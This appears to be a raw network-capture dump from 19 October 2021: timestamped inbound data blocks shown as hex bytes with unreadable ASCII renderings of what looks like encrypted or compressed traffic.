                                                                                                                                                                                2021-10-19 05:23:31 UTC588INData Raw: 29 70 59 a3 06 c3 d6 83 e7 30 1f 31 14 82 47 87 01 f3 e6 1e 86 09 6d 0c c0 c0 74 00 bf cd 42 7e 5e fb 14 2c 00 47 f9 8b eb af 07 6e 09 0e 46 e9 21 fe 49 df aa 4b 82 12 ca 89 e1 05 d3 e2 c1 92 00 2c 93 f8 a8 1c 21 a2 ed 87 25 ef 42 f2 b8 99 a3 09 c5 d6 32 30 c9 c2 44 6f 6b d8 20 c6 f4 96 62 61 3f 31 f6 2c 5a 09 ef ff 37 c7 c0 05 21 d6 2d c9 8d 22 8c c0 33 28 ce 23 56 f9 d1 02 36 7f 11 c6 80 49 85 e6 8f b0 81 a9 62 d6 76 b4 6b 18 0f b6 9d 3b 2c ce 69 52 59 ec 9a f9 26 60 c4 2e e6 25 88 24 c1 12 ce 28 7e c9 38 db 58 1a fb ba c6 4a 51 f1 7e 2a 0b 21 ea 12 7b c5 2e 12 f6 e3 d8 45 1b a4 47 11 c9 9b 6f ea ee 46 78 12 ea 31 de a3 54 05 01 1a ff e7 8b e7 2f 1e 9b 56 f2 fb c7 cd a1 1c bb 3f 0e 8a 41 68 73 0e 50 07 97 26 02 17 4b 35 20 17 35 32 5d bb d9 69 17 d7 80
                                                                                                                                                                                Data Ascii: )pY01GmtB~^,GnF!IK,!%B20Dok ba?1,Z7!-"3(#V6Ibvk;,iRY&`.%$(~8XJQ~*!{.EGoFx1T/V?AhsP&K5 52]i
                                                                                                                                                                                2021-10-19 05:23:31 UTC604INData Raw: 1c be ed 7a ca 70 8e 06 1c 21 ac 1e 0b 12 bb 59 6d da 60 d1 e3 89 5d 13 3a 92 ec 45 ad 6a 28 ab 16 d6 48 a6 91 b2 ef dd 3a 44 75 b1 1f f8 8b 24 8a 1e b0 ac 2b 37 27 39 30 d9 7e e0 4b ae c4 0c 95 fb 39 8b 29 33 5c 82 58 1c 98 3e e4 48 2f e7 18 63 01 d3 e5 e9 31 6f 64 65 a8 9b 2d eb 9a ed 6c b7 5a f2 dc db 3e 9f ec 5a 5c d6 2c 78 8a 7f 1a b8 60 5d 21 fe b5 66 65 2d 8b 27 74 7b 69 5d 32 b3 d5 45 b8 6b 16 f1 0a 1d ca a5 6c 0e e0 02 11 44 d8 4b 3f b6 a0 3c 06 89 39 eb 27 d7 94 cb 5b 0b b2 06 c0 e9 fb d7 46 4b 86 25 01 f9 61 ec c6 28 e3 d6 ff 0b 78 e8 89 c9 dc 64 e5 df e8 b1 dd ed 7c 89 bf af c7 1b b1 c2 f7 57 cc e6 5b f6 e9 c6 d7 f8 c5 5a b3 82 4f d8 ae ea b3 64 1a 1b 7e 5d ba 26 f6 d8 60 c3 ce f7 38 4b 68 cc 25 31 b0 27 9e d5 3b 2f fe b1 74 d2 7b 25 12 84 f7
                                                                                                                                                                                Data Ascii: zp!Ym`]:Ej(H:Du$+7'90~K9)3\X>H/c1ode-lZ>Z\,x`]!fe-'t{i]2EklDK?<9'[FK%a(xd|W[ZOd~]&`8Kh%1';/t{%
                                                                                                                                                                                2021-10-19 05:23:31 UTC620INData Raw: ec db 1a 9f 09 a5 74 54 cf 33 b1 d0 2a 9d fd 7b 8c 3d f0 24 21 d0 b1 a7 ba 9e d7 82 4f c6 b8 c6 e0 4e de cb 8b 40 32 f3 97 c6 bc 82 24 74 9c 49 dd 4e 7c 95 3a 89 d4 80 7a f7 4c 4d 81 d9 01 8b 2a c2 0c e6 73 d6 30 eb 56 86 0f b9 2b 92 be 25 42 aa a2 26 b2 03 df 96 42 81 4d 2d 28 79 d0 0f 12 09 c2 ef 94 09 52 2f f6 f8 7d 53 0c cf 5e 16 d4 ee 99 7d f2 69 31 e9 6f da 7a 2f 29 76 bf 59 01 0d 38 9f 4a 98 db de 91 e0 47 05 f9 f4 e8 52 03 0f 39 0e 93 07 d7 e4 1c bc f0 a2 5a 49 42 cf 6a 2d 87 09 7c 44 a1 ab 09 64 09 30 36 c1 0e a3 11 fd ec 76 e2 32 54 9e ed da 2e a1 50 6b b1 07 3f 72 f7 8b 5f 6c 05 95 de b8 45 c7 02 f1 08 09 cb 8a b2 91 61 89 11 21 3e 64 c8 aa 17 45 29 72 3b 12 6f a2 a2 96 b8 b5 d3 53 ca 57 bc f2 a8 d2 eb c4 7c e3 e5 77 4a ca e8 14 d3 12 46 a9 5a
                                                                                                                                                                                Data Ascii: tT3*{=$!ON@2$tIN|:zLM*s0V+%B&BM-(yR/}S^}i1oz/)vY8JGR9ZIBj-|Dd06v2T.Pk?r_lEa!>dE)r;oSW|wJFZ
                                                                                                                                                                                2021-10-19 05:23:31 UTC636INData Raw: 10 c9 52 fe cf 0a 30 d4 5d 30 2b 62 76 69 e2 20 e5 17 4e 11 d3 fc c0 5b e2 8b a5 64 e7 af a8 2b 93 cf 33 c5 fa a8 23 eb c8 83 ce f9 44 60 8a be c3 e0 0e 00 c9 93 e2 90 ee 63 39 2c 3a a8 b6 b6 0c 8b 62 87 94 90 15 14 75 a9 29 a5 03 d5 18 ba 80 bb 18 1a 19 df 2e b6 46 90 16 08 b0 30 1f e5 39 79 b7 64 fc 06 38 56 e6 c8 01 16 5f 57 91 3b f9 4a 24 34 70 19 44 55 ca 50 3f 86 21 af d8 87 1e 00 77 5d 6e 12 7c 4e 65 2f 06 91 68 a3 23 bc 88 14 39 a1 24 8a 18 62 75 30 c2 f0 19 c5 19 c0 48 16 d2 84 49 d4 c2 c3 05 de a4 01 7a 82 83 42 94 6b 03 2c 72 20 5d de 4c 0d d1 26 13 c8 18 cc 4c ce 12 92 2f 96 03 f7 dd 17 cc 02 50 1a 3b 06 65 b0 00 f9 3e 94 b8 0c 8e af 3f bd 3c d1 b5 70 a2 03 43 f1 9e ae b0 33 04 b6 06 c4 d7 e9 92 68 61 80 ce 70 df 0a e5 72 6c 28 f3 40 ba 30 d9
                                                                                                                                                                                Data Ascii: R0]0+bvi N[d+3#D`c9,:bu).F09yd8V_W;J$4pDUP?!w]n|Ne/h#9$bu0HIzBk,r ]L&L/P;e>?<pC3haprl(@0
                                                                                                                                                                                2021-10-19 05:23:31 UTC652INData Raw: 5c 8a 92 c7 2b 2e 1e 8f ae 26 1d b8 cc c5 1e c0 a6 62 28 44 e6 78 89 e0 80 e8 a8 a1 3a d0 28 51 40 a5 c1 21 ff fe 73 48 9b 4a c7 d6 c8 98 db a2 16 e9 56 7f 1d b0 47 1e e6 18 07 23 b5 41 5e ab d6 44 1c ef 27 74 b9 6b a2 3f 05 a8 76 6b 69 f1 0c 3c 30 31 10 1b 98 d0 6b 04 3a d9 bb 60 e6 e2 e5 49 43 29 20 09 80 2d 89 10 95 fc 83 49 44 25 05 0b de 20 84 7b aa a7 0c 4f ff 34 35 52 43 e7 14 2b 1f 0a 2f df a8 fd 1a 68 75 8a 07 2d 0f a7 57 ce 8c b5 94 d1 e0 c3 87 9f 01 61 cd 19 2b a9 d4 d6 aa dd b8 2a fa 29 88 2b 31 a2 39 17 2b ec 00 a0 3b 5c 66 57 0a 0e 02 29 cf e6 b2 27 d3 21 bf 16 0a d4 0b 4a 20 dd 64 bf 5e ac ca 5a 12 8b 0e ae b2 6d b8 42 12 48 3e 70 ba b3 2e 4e dd 52 6e 0a ee 5e ca 52 7d 45 a3 a0 d4 96 4c c2 c3 04 2f 87 37 a8 d2 33 36 57 1d 14 2d d7 3e 6e 9d
                                                                                                                                                                                Data Ascii: \+.&b(Dx:(Q@!sHJVG#A^D'tk?vki<01k:`IC) -ID% {O45RC+/hu-Wa+*)+19+;\fW)'!J d^ZmBH>p.NRn^R}EL/736W->n
                                                                                                                                                                                2021-10-19 05:23:31 UTC668INData Raw: 09 fa 57 d9 08 bb ac c2 04 25 61 e6 f1 71 78 13 9b db d2 c3 19 09 df 93 f9 da cb fe 6a c2 81 c9 f7 f9 c6 42 8b 10 d6 35 4c f2 2d a0 14 21 fb b3 15 81 11 ff e6 7d 76 81 9c c5 5a e5 d1 24 cc f8 75 92 5e 0f 69 bf 64 43 a8 08 87 62 4d 31 0a e8 43 99 73 f5 82 5c 82 a1 c7 84 ad 98 46 d3 88 33 8e a3 a0 a8 c2 03 df 99 9f a5 86 13 89 fb a9 18 01 13 fe f9 73 15 72 3d f2 df 90 93 b2 e5 cc 20 5e d0 ec 0c 25 0a 0f 0b 40 12 7d f0 c3 56 19 44 ce f8 2a 40 b6 03 17 67 9f 2b 11 e5 3d 48 25 83 06 fc 26 e9 0a 03 3a a5 f5 fd ff a0 b8 88 d6 66 60 d7 f6 3d ea 32 fe 7f 4a 70 09 0c 22 04 7f ac 34 0a 1f 21 bc b0 c0 ff 07 46 45 13 1d 4c ef 3b 06 83 e1 ee 1e 0f 09 91 41 33 77 41 84 05 dc 0a bd c0 c0 d6 60 31 a0 96 18 68 f0 bc 14 dd d4 c7 08 24 08 80 0c b8 62 be 19 37 c2 dc 18 c4 80
                                                                                                                                                                                Data Ascii: W%aqxjB5L-!}vZ$u^idCbM1Cs\F3sr= ^%@}VD*@g+=H%&:f`=2Jp"4!FEL;A3wA`1h$b7
                                                                                                                                                                                2021-10-19 05:23:31 UTC684INData Raw: 5f f6 ac 54 01 09 86 ae 0f 5a 07 c3 a0 26 03 fb 50 4b db bd 03 43 6e 41 1b 45 a0 05 bc 36 e1 8c 5e 00 8e 86 cc fa f7 fb ff 82 2e 5f f1 dd d5 43 2a 2e 5f b9 a3 34 1f 4f be c5 eb 4e 77 37 24 ad d6 26 e9 57 bc b4 cb 3c 3b 77 12 26 7d 9f 9d 8c a5 4e 88 39 fa d7 14 5e 0b ad cc 3c 81 3f f3 1c cc 24 cc ee 80 29 63 7c 35 00 ce 7e c9 75 5d f4 8c 0a 19 f7 ec ac 38 10 9e 6f 7e 82 e7 77 98 69 80 93 51 26 da 13 a0 91 f0 8a e0 8c 63 87 1a 77 23 60 a6 1a 71 49 37 74 df 18 40 7a 50 78 ad a7 9f 4e 03 af 29 dd 6e ca af 17 39 11 be 8a 8b 5a f9 af c5 8b 01 88 c6 0d 8a 4c 0a 95 dc 21 69 f6 96 d3 02 1a 8a 16 38 17 9c f5 e5 e6 2d 51 1c e9 f7 c4 44 94 b1 25 77 1e 2f 78 3e 43 e7 20 fa 95 d6 b3 53 5b cb ef 76 14 b0 bd ec c9 b0 34 8a 72 53 eb 90 11 8b 28 57 65 8e 94 0c 0b 70 b5 76
                                                                                                                                                                                Data Ascii: _TZ&PKCnAE6^._C*._4ONw7$&W<;w&}N9^<?$)c|5~u]8o~wiQ&cw#`qI7t@zPxN)n9ZL!i8-QD%w/x>C S[v4rS(Wepv
                                                                                                                                                                                2021-10-19 05:23:31 UTC700INData Raw: 56 3b 19 2d ca 56 ce cc 64 fe b5 4e 43 79 da 4d 03 a3 99 bf 89 31 15 3a 92 fc ea 77 96 4b 9f 7c 0c e7 e3 a5 cf 64 af fa a1 79 2f 64 13 8c 33 31 13 c1 ba 01 61 3a ca 40 3a 8d de 2e 32 47 f1 88 45 1b a4 53 05 1b 9b 71 12 f7 fe e1 81 21 7b 2b 8a b0 4a a8 11 4c 75 a4 fa a1 bb 14 d5 dc 1b f1 a2 2e b1 1d 35 3a ca 75 4b fa 21 4c 89 1e 34 99 ee b5 7e 15 5a 5c 7b c2 c7 40 1b 74 36 f4 21 97 e3 5b f5 29 1a 3a 23 e4 01 b4 99 fb 6a 0b 1b d9 88 3b 5f 93 e1 a8 5a d7 9c f3 42 b1 3a 41 31 fb 09 2f 4a de c1 b2 65 f3 af e3 85 28 c3 23 fb 11 31 d7 3f cc 51 8a 58 06 09 88 11 85 08 ca 9c c4 29 fe b3 2a 4e a2 90 5e fa 28 a1 ca 86 6d 0b 19 17 04 b8 63 b1 89 c7 d4 c3 99 99 07 e2 63 96 1d 89 29 cb 32 fd cb 17 54 0d ea 02 c9 73 14 0a 03 08 b6 09 01 d1 77 e2 4a 5d f6 91 13 02 29 a9
                                                                                                                                                                                Data Ascii: V;-VdNCyM1:wK|dy/d31a:@:.2GESq!{+JLu.5:uK!L4~Z\{@t6![):#j;_ZB:A1/Je(#1?QX)*N^(mcc)2TswJ])
                                                                                                                                                                                2021-10-19 05:23:31 UTC716INData Raw: 11 f7 01 6b 80 7c db 27 de 9b 62 09 ff 09 79 dc bd 76 93 19 0d 03 1a c6 66 ce 5f 16 bb 13 c5 a8 db e5 87 bf 22 f9 b9 99 dc 1a 3e 31 86 31 d9 66 3f 12 01 f1 fe 8d a1 93 de fe 57 c3 fc c8 4e e6 2f 2d 8b f9 a1 84 01 c9 ba f3 85 4b b8 db 2f f6 45 9f 82 09 c1 29 fb ff 94 4f 5f 02 c2 e8 f9 5d 65 90 2f ce 7c 5f e7 fc 6b a9 3f b2 56 96 f8 fb a8 04 e1 c2 16 95 c7 e2 e0 1b e9 8d d6 4f fc a8 c0 30 09 cc a5 1e 63 03 0b 69 d8 b2 5c 0a 3c 6a e5 f0 3f d0 23 82 4d 06 c9 cc 04 5a c2 07 5e 93 12 76 09 00 22 a2 b3 d4 ed 40 3e c0 a5 6b 90 95 35 d1 e7 34 ba d0 a8 4a 20 27 62 e9 5c 69 64 5c c1 80 15 de a8 fe 09 81 30 f8 50 4c eb 6b 4d c0 36 e6 e0 ff b3 2f c1 38 fb 94 a8 7b 82 0c b2 62 7f 71 8e 24 80 cc 28 a4 78 a5 30 ec 06 24 dd 6f 98 ce 1e 84 b3 17 38 ee 20 ea fb 29 86 18 b8
                                                                                                                                                                                Data Ascii: k|'byvf_">11f?WN/-K/E)O_]e/|_k?VO0ci\<j?#MZ^v"@>k54J 'b\id\0PLkM6/8{bq$(x0$o8 )
                                                                                                                                                                                2021-10-19 05:23:31 UTC732INData Raw: 01 f5 6e f9 5a 2a e9 3e fa f6 f2 e8 b6 8d 62 31 fe cc c3 25 05 f8 d9 b5 49 55 73 4d 2d ba 01 89 1e 7c 5a 69 8b 98 8b c4 dc ce c4 f3 a1 62 7e a6 59 51 00 7d 75 8a f3 1a 16 33 fe c0 73 f1 0d 98 32 51 15 45 cb 90 1a 09 c3 9f 99 ea 21 d6 5f b1 5c c8 6a cd e8 a7 30 c1 a5 10 23 36 41 98 61 00 19 91 2b 87 1a 7b dc a6 ad 59 19 bd 7f bd 70 78 74 ff 4e c7 ba cb 85 5e 17 6c fe 39 2b 7d f2 85 01 0a ff ca 68 4a ff 3b 98 41 1c d8 32 a5 29 a6 7a 0e 40 22 ab 2a 80 4a 35 b8 3c b0 33 fe d7 5e 55 ae 62 ef c3 b0 59 0b 32 3d 39 33 2f f7 b1 f3 e1 08 31 59 c1 ab 25 ff f6 cf 92 f3 b7 1d 49 37 8a e9 77 94 c3 a5 c9 f1 f5 9a 63 63 cb 4a 36 e2 94 96 04 ae 8a 06 83 42 13 ba c9 e6 0b 21 e7 1c 27 7d 89 6c 7e c1 59 f1 3a 31 31 33 13 2a dc 94 c1 59 04 03 96 88 92 82 88 31 cb 2f 03 17 d4
                                                                                                                                                                                Data Ascii: nZ*>b1%IUsM-|Zib~YQ}u3s2QE!_\j0#6Aa+{YpxtN^l9+}hJ;A2)z@"*J5<3^UbY2=93/1Y%I7wccJ6B!'}l~Y:113*Y1/
                                                                                                                                                                                2021-10-19 05:23:31 UTC748INData Raw: e1 f3 44 0c eb e8 1c 4d 62 62 10 2f ec 00 e3 c7 17 0c c0 0c 11 fa 5e fe b9 73 21 06 e7 58 82 59 44 1c 09 37 5f 0a e0 8f 35 d6 a0 ac e7 01 26 95 9a 0c dd 40 d4 41 90 de 72 dc aa 4d 14 ab 6e bb f9 00 bd 30 f1 ad 81 87 f6 31 f3 b5 16 2c b4 e8 7f 1d 60 f4 13 09 5e ef 03 00 1a 74 8b f6 2c b7 e9 e3 5e bc 0f 12 b5 d4 81 09 5b db d4 20 c7 41 d6 94 8b c5 40 d2 53 00 7c be ca ac fe 7f 58 2e f3 81 1f aa 71 eb 2b fd 01 82 69 70 04 57 f9 0e 47 76 df b1 5f a1 2b 2a cb 18 88 14 c5 82 29 07 20 f2 c2 12 eb a3 65 fa 37 91 1d 21 2f 33 72 1b 92 38 d7 98 65 0f b6 4a 13 f8 1c d0 17 59 c0 d3 fb d2 b3 82 c7 4d 8b 21 16 57 47 0a 2d 48 a0 88 11 f0 eb 0b e6 1d a5 5e 5e 2b 68 53 ad 56 2c 38 4f cc 4c e6 42 04 2f e9 7f 8b b7 5d 9a 2a 5d c3 ae ec ba ad c4 21 c6 a7 59 3e 8e 29 d6 c4 df
                                                                                                                                                                                Data Ascii: DMbb/^s!XYD7_5&@ArMn01,`^t,^[ A@S|X.q+ipWGv_+*) e7!/3r8eJYM!WG-H^^+hSV,8OLB/]*]!Y>)
                                                                                                                                                                                2021-10-19 05:23:31 UTC764INData Raw: 13 45 03 2f fb 39 27 64 a1 09 33 39 f9 b8 a3 46 af 16 2b 8b 45 f2 03 74 03 0b 40 76 14 98 a8 51 29 39 ae 3d df a6 29 c7 5a 57 8b 48 df 1c 48 70 c4 e1 0f 46 5a fd 7b f6 41 4a bb 98 43 11 9f fe a8 7e 13 e0 89 10 eb 6a 31 04 05 7e a6 60 a8 73 73 1d af 33 6f 9e c4 43 34 3a f8 61 58 1c 21 80 d0 47 3b 91 04 13 05 fa 1d 4f 27 52 43 60 e6 e2 03 13 f5 ae d6 d1 cb 1c 11 b7 29 05 d8 c7 9e b8 a9 13 e3 dd b0 22 75 5a 5b b4 0a 83 4a 27 b2 f2 00 7f 9c 8a 81 56 d7 05 33 43 04 38 74 1c 2a d0 85 08 67 e7 1d 64 28 2b e1 00 b6 b7 e6 72 de eb 22 c6 19 25 86 cc 72 8a 7b 77 04 36 01 37 e3 d6 20 d4 34 a9 72 e0 7d 18 e1 da 5c 34 3b 73 c5 18 79 36 1e 1a 4e 8c 35 02 12 f9 70 56 0d 03 de 9b b8 56 31 18 6f 15 54 4a a4 30 31 00 a3 71 6d 58 cc ae a0 ce 89 12 63 d6 0d 47 9c d8 2d 40 9a
                                                                                                                                                                                Data Ascii: E/9'd39F+Et@vQ)9=)ZWHHpFZ{AJC~j1~`ss3oC4:aX!G;O'RC`)"uZ[J'V3C8t*gd(+r"%r{w67 4r}\4;sy6N5pVV1oTJ01qmXcG-@
                                                                                                                                                                                2021-10-19 05:23:31 UTC780INData Raw: ac ee 1f b9 01 4f 91 92 de fa fd bc 87 62 1b e3 fd 77 90 73 79 db ee f4 1c e1 fe 4e 82 53 98 ec 10 5d 20 07 c4 57 62 2a 06 8f 9a 0b 09 66 6c 1b 6c 3f e3 24 0d e4 0f 69 eb 62 ba 9c cc 02 14 31 9d c5 14 54 22 cb 05 3d 10 56 ba 88 b7 aa f2 a0 70 09 0d d4 b3 de d5 0c e4 02 dd 09 47 8f 83 1a 03 11 ba aa 06 40 66 f8 cd 7d 26 e8 be 60 e5 33 58 48 57 7f 00 02 ff f6 72 5a c4 b4 66 30 a0 e6 20 38 8a ef 38 e3 0b 38 85 16 8f bf 06 eb 84 e2 20 31 80 2c 60 c5 dc a0 10 8d f4 50 14 f2 95 e3 57 14 12 0a 87 04 d5 3c c5 c0 80 50 53 e4 8f 50 51 12 6a 05 73 b4 72 02 3a e4 0b 69 60 b7 2c a4 f5 ca 65 09 3e 22 3d 61 0f 02 af 7e 02 ae 78 a7 86 a5 79 09 02 69 30 f6 e9 96 b2 e8 33 4e ae d4 98 c0 4a cf 40 77 64 10 21 c7 49 03 7f 59 69 3f 2f ef f3 2f 6b 80 9c 01 e6 89 16 bd 5e 4f 7e
                                                                                                                                                                                Data Ascii: ObwsyNS] Wb*fll?$ib1T"=VpG@f}&`3XHWrZf0 888 1,`PW<PSPQjsr:i`,e>"=a~xyi03NJ@wd!IYi?//k^O~
                                                                                                                                                                                2021-10-19 05:23:31 UTC796INData Raw: 35 24 c6 27 5b ad 2d 59 b9 98 0e d4 a8 9d 27 ef 49 45 b0 13 0e 1c b5 97 f3 bd a7 9d 49 01 c8 89 70 58 db 5d e2 80 97 ae cb b7 5c 77 2b 09 fc 34 c8 e3 2c 4f b0 20 01 d2 c2 ae f3 e3 d2 be 16 27 f9 e1 b1 8a 18 2a e8 bd ac e3 bc 9a d1 07 17 75 18 be 9d f6 e6 94 19 44 01 0f 29 b6 10 11 44 03 fc 4a d0 2a de 49 01 da 83 f1 39 fa 52 a8 0a 43 15 2b 8b 3f 72 03 69 03 10 65 6c 25 df 45 4a 29 3a 66 37 98 f7 5f b8 5e 84 65 05 af 85 39 6c aa 02 a7 52 da d9 ba c8 e5 64 01 af b9 69 de a1 59 0b c3 84 72 03 77 cd 65 40 e9 dd cf 49 b0 9c 00 da 55 46 5e fe 71 83 4b 18 24 98 ad 1d 52 1b 2c f1 9e 90 1c 6e 07 c2 1f e7 fa f2 07 f9 24 33 52 7d 92 40 28 db 62 24 7e 6a aa 00 15 a8 d5 19 ee 29 98 2d e0 14 f8 49 05 0f fc ff 32 69 af e2 b5 0c eb 02 5d 1a 90 03 01 a7 aa 58 87 fa c0 7a
                                                                                                                                                                                Data Ascii: 5$'[-Y'IEIpX]\w+4,O '*uD)DJ*I9RC+?riel%EJ):f7_^e9lRdiYrwe@IUF^qK$R,n$3R}@(b$~j)-I2i]Xz
                                                                                                                                                                                2021-10-19 05:23:31 UTC812INData Raw: 3f e9 05 1a c6 5c 33 75 de 60 d9 36 7a 89 b6 3b 09 f7 eb d6 21 ed 26 2f ea 6c 82 b7 f3 2e dc 8d 18 2e 81 eb a4 0b 35 63 f5 e5 03 2d d1 74 44 06 be f3 69 89 04 f9 55 44 c4 52 aa 0b 80 e0 7e 63 52 7f db 8f ae 36 58 e6 9e 17 20 16 67 be 72 c9 2f 89 0d 7e b4 58 d0 4c 2d f8 4b d1 ff 45 37 2d 34 04 19 35 34 fa cd 88 10 30 36 db c9 2f f4 5e 94 c1 bc b7 c9 0b 51 09 dd 5a 94 9c c1 ad 5d be 34 bd 78 bc 2f 80 f9 ee 6d 43 57 df 23 ad 5b 7a 93 17 ef cb 5c 04 c2 e4 b1 ad ba f7 20 42 ad 86 8b 3e ce 0b 82 8d 80 78 14 94 25 21 3b df 47 1f c7 16 0e 10 e0 07 83 17 2f a7 42 5d 9c 7c 9d 55 19 ef 02 6b f2 99 90 60 c5 29 1e aa b2 e8 d6 fd 82 c2 11 39 10 54 21 58 35 d6 15 8d c7 52 e1 5b e6 a1 80 27 3d e5 4e 58 b7 e5 e3 82 db 9c e6 08 5d 6e 6e 5e c7 70 d3 0b 13 39 5a 17 b2 c1 c9
                                                                                                                                                                                Data Ascii: ?\3u`6z;!&/l..5c-tDiUDR~cR6X gr/~XL-KE7-45406/^QZ]4x/mCW#[z\ B>x%!;G/B]|Uk`)9T!X5R['=NX]nn^p9Z
                                                                                                                                                                                2021-10-19 05:23:31 UTC828INData Raw: 61 46 62 25 28 6f 67 09 cc 6f 18 18 c6 09 8d 32 78 66 92 09 09 19 69 0e 09 8c d7 08 04 c4 11 52 78 96 ac 09 33 db f6 18 e0 14 09 88 08 a4 32 8d 09 e8 49 f8 ed 99 09 c7 29 cc 99 09 74 29 79 8c 09 9d 67 18 a2 c9 09 42 26 54 47 09 66 bd 39 c2 09 44 d1 d6 89 6a 98 49 6f 09 92 01 81 97 11 49 45 43 ac 4e 33 09 7e 29 83 26 09 42 8c 98 47 09 c1 f1 cc 78 c6 09 43 66 0a c8 48 09 28 8f f2 84 63 94 09 66 f5 31 38 6b 09 d2 58 98 28 d7 09 63 a5 a1 fc 68 8c 09 da 9f 58 df c4 09 63 d0 08 68 8c f8 ae 28 fd c4 09 02 af 08 07 91 0c 22 11 44 16 1b 88 91 61 cc d8 96 09 e8 66 6f 58 ed 09 24 80 29 48 b2 09 6e 69 bc 73 91 09 78 22 7d 33 90 f7 38 95 33 09 82 19 87 19 09 07 84 f8 0c 92 09 3c 4c b4 41 09 e9 5d 83 20 62 09 72 e4 cb d0 33 09 1b 39 20 76 09 89 16 13 fd 31 39 02 11 b0
                                                                                                                                                                                Data Ascii: aFb%(ogo2xfiRx32I)t)ygB&TGf9DjIoIECN3~)&BGxCfH(cf18kX(chXch("DafoX$)Hnisx"}383<LA] br39 v19
                                                                                                                                                                                2021-10-19 05:23:31 UTC844INData Raw: ff bb 00 bc db 8b 12 31 f3 b5 54 32 4f 05 c7 66 c4 b9 bf ac 4a 61 5e 29 cb bb 3f cb 25 6d 44 b6 6a cd 79 0c c2 c2 4b 0a 37 37 e4 04 99 87 2b 08 d4 11 e4 09 22 3b 22 01 db 8f 95 a1 ff 51 81 e1 2e 2d ca 10 7c 81 cb 02 91 2a 49 fd e7 8f 1e cb e8 68 50 80 89 59 90 35 25 3c 70 6c ff 4b e1 8b 7a 4a 0a 9b c3 93 23 32 23 d9 35 71 af b2 28 12 31 db e4 bb 58 8b 5a 7a 35 7d bd 79 8a ce 43 c9 ff c5 e6 be 42 11 29 fb 68 8a 95 5a 2b 56 e1 2e df 9d a9 09 f9 bd cb f2 9d df 9b 10 d7 6a 56 a5 69 d4 2f 2f 38 01 23 84 5a ff aa 45 94 cf 28 ae 29 69 1c 9d f7 b5 de 8b 4d 97 2b 4a c9 23 37 52 56 94 4f 58 6f 29 db a6 2b 2b c7 1c c8 09 09 cb 72 c1 5e 78 9d 59 02 d1 bb b6 c0 24 84 2f 03 6a a7 25 66 9d cf f1 cf 8a c3 6e ca 93 65 cb 37 f6 65 01 33 4f d7 45 cc ef 4b 7a 1a 31 d3 e9 8d
                                                                                                                                                                                Data Ascii: 1T2OfJa^)?%mDjyK77+";"Q.-|*IhPY5%<plKzJ#2#5q(1XZz5}yCB)hZ+V.jVi//8#ZE()iM+J#7RVOXo)++r^xY$/j%fne7e3OEKz1
                                                                                                                                                                                2021-10-19 05:23:31 UTC860INData Raw: 1d 6e 22 6a 30 14 83 8d 23 60 0e 30 68 77 a8 f6 0c 76 fe e8 a1 20 82 60 8c 1c 2e 0d 1c 48 c0 14 99 c0 fb 65 fd 56 61 ce 01 1d dc 80 f8 c2 9e 50 be 17 0a 94 09 e6 fc 29 fb c0 e9 4a db 61 86 20 fe 93 6d 40 fa 0c 16 20 6f f1 16 a9 7f 90 20 22 0b e0 b5 12 35 fa ff 41 ac 15 f4 6a 4d 92 0f 5f c1 ca fe 2b 40 44 28 4e 6c 60 0d 46 80 f6 9c 3c 00 45 e1 ce 53 d5 a9 34 9a c1 6a 84 de c6 5b 53 bf c8 b8 86 83 10 40 4e 8c 09 d0 bc ba 9b 20 d3 90 e4 35 d4 50 ff 34 c2 fe dd 18 9b 51 50 24 90 66 00 2a 01 85 16 f8 ff eb df 0c 7b d5 98 78 20 e1 e6 c7 50 dc 20 09 02 d3 41 d4 44 e9 21 8e f8 d9 18 83 d6 e8 0a 25 43 30 6a 55 0f 02 94 b3 30 d8 9a 4e 76 92 b9 18 09 e3 29 21 3d d1 49 6e 1e 07 37 2a 5e 22 79 20 a0 49 d8 5b 51 53 21 d8 06 da 22 1f 44 31 90 2e 63 8a 0c c6 09 14 28 92
                                                                                                                                                                                Data Ascii: n"j0#`0hwv `.HeVaP)Ja m@ o "5AjM_+@D(Nl`F<ES4j[S@N 5P4QP$f*{x P AD!%C0jU0Nv)!=In7*^"y I[QS!"D1.c(
                                                                                                                                                                                2021-10-19 05:23:31 UTC876INData Raw: cc 56 d3 64 01 a8 f2 81 8e 8b 32 33 7e 41 be 45 bd 99 98 2e c2 0b c3 fb 66 22 8a 51 0d 50 15 22 a0 10 d0 11 81 c3 0d 4c 4f 5b c9 20 7b 04 c7 ef 05 aa 68 4e e6 d0 22 f2 5e a2 d5 d3 89 d9 6c f7 5a f7 32 25 d5 4c 27 5b 08 8c 71 0b 1f 06 39 02 d2 09 e2 5e cf ef 6b 2f 64 f8 17 e9 ff 31 fc d3 a4 ae 84 e5 ee d8 88 ee 55 04 3e 22 63 84 31 fe 12 61 5f 01 f0 bd 7a ce cc f1 b8 95 db 7f 13 f0 e1 2e 39 63 df 57 f8 ec bc 2c f3 a5 09 f6 26 d3 5a b8 27 04 4c ec ac 25 d7 3e cc 95 df bc b7 60 31 c8 8b 37 b8 f0 8c 67 12 21 f0 ba a8 ca c5 29 d9 99 c2 79 9a 8b 3b d4 a5 be 25 c9 76 d8 50 01 38 a1 fd 56 21 f7 d4 1c 6a 1c 74 6c e8 07 5f 60 fc f0 07 e0 3e ed 01 bd 46 5e 64 92 88 f7 31 b0 e8 b4 44 02 d9 1e 18 37 3b 79 d5 68 e5 eb d4 76 fa 16 39 27 be a8 b4 0f 73 41 42 0f fb 80 d2
                                                                                                                                                                                Data Ascii: Vd23~AE.f"QP"LO[ {hN"^lZ2%L'[q9^k/d1U>"c1a_z.9cW,&Z'L%>`17g!)y;%vP8V!jtl_`>F^d1D7;yhv9'sAB
                                                                                                                                                                                2021-10-19 05:23:31 UTC892INData Raw: 8b d4 71 81 b8 4d d2 f4 4e 21 3c 08 ed f7 18 78 02 80 23 ef b7 24 07 6d a4 04 cd 23 ba 90 38 6b 49 e8 60 0c a0 db 92 63 94 fd 24 f4 82 06 a2 0d 58 4b fa 52 70 a8 0c 48 60 15 b0 3c c4 04 93 70 98 ac ef c0 46 1e a7 02 99 44 80 9b 66 57 93 e4 ba 36 80 5b 34 28 05 16 d3 6f 6a f2 d3 8b 81 01 a4 71 49 32 fe 5b ba 6b b9 7c 38 c8 0a f0 69 fb d1 b9 3d c6 62 e8 ef d8 8e d1 06 72 52 48 02 3c 02 fe 6a 03 f7 d6 24 00 79 8c bc cb 1f 6f 50 20 af de 05 fb 52 17 34 57 f8 bb 70 0c e9 e0 73 12 0a 05 24 af 11 dc 00 e7 0e 3c ae 30 3a 60 4d 52 6e e5 a9 25 1a 01 93 04 08 82 5e fc a7 48 40 e2 fe ee e1 fb 92 c0 9b 0c ad f0 1d 74 00 e0 7d 73 0d 42 0c 76 04 55 